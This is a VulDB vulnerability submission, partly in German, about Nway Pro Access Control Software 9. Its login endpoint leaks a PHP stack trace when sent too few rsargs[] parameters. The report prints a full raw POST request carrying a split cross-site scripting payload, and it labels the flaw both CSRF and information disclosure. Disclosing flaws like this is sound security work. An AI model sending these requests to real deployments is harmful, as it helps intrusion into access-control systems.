Submit #284610: Nway Pro Access Control Software 9 Cross-site Request Forgeryinfo

TitelNway Pro Access Control Software 9 Cross-site Request Forgery
BeschreibungA vulnerability was found in Nway Pro Access Control Software Version 9, from https://nwaypro.com/. The login functionality needs at least 11 "rsargs[]" POST parameters to function properly, if you give less then 11, the application respond with a PHP Stack Trace, disclosing part of parameter's values. Example of body response is: Notice: Undefined offset: 10 in C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\index.php on line 1557 +: Fatal error: Uncaught ArgumentCountError: Too few arguments to function ajax_login_submit_form(), 10 passed in C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\login_sajax.php on line 122 and exactly 11 expected in C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\index.php:2247 Stack trace: #0 C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\login_sajax.php(122): ajax_login_submit_form('<script>/*........', '*/s="XSS";/*}S]...', '*/s+="XSS";/*', 'aaaa', '*/alert(s)/*alt...', '', '', '', '1111', '-->*/</script>;...') #1 C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\index.php(2196): sajax_handle_client_request() #2 {main} thrown in C:\NwayPro\Server\web\wwwroot\v9\app\nwaypro\login\index.php on line 2247 This is the reponse for the following POST request: POST /v9/app/nwaypro/login/ HTTP/1.1 Host: <IP> Cookie: PHPSESSID=3c4427832be4dbab96e51c96a3df8aa0; sc_actual_lang_Corporativo=pt_br Content-Length: 322 Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120" Content-Type: application/x-www-form-urlencoded Method: POST /v9/app/nwaypro/login/ HTTP/1.1 Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Origin: https://<IP> Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://<IP>/v9/app/nwaypro/login/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9,pt-BR;q=0.8,pt;q=0.7 Priority: u=1, i Connection: close rs=ajax_login_submit_form&rst=&rsrnd=1708369374052&rsargs[]=<script>/*......adsfasdfads&rsargs[]=*/s="XSS";/*%7DS%5DUHcJ2T%3E&rsargs[]=*/s%2b="XSS";/*&rsargs[]=aaaa&rsargs[]=*/alert(s)/*alterar&rsargs[]=&rsargs[]=&rsargs[]=&rsargs[]=1111&rsargs[]=-->*/</script>%3B5E-Z%7B_(Eb6HMM3*0!M)2N9hPc!wSWS%3B11O_%7D0%5DC7%3Bs2hW0Ur This can be used to forge malicious requests using the vulnerable application. The login URL is: https://<IP>/v9/app/nwaypro/login/ .
Quelle⚠️ https://x.x.x.x/v9/app/nwaypro/login/
Benutzer
 lorenzomoulin (UID 33175)
Einreichung19.02.2024 22:22 (vor 2 Jahren)
Moderieren29.02.2024 14:28 (10 days later)
StatusAkzeptiert
VulDB Eintrag255266 [Nway Pro 9 Argument login\index.php ajax_login_submit_form rsargs[] Information Disclosure]
Punkte20

ZurückÜbersichtWeiter

Might our Artificial Intelligence support you?

Check our Alexa App!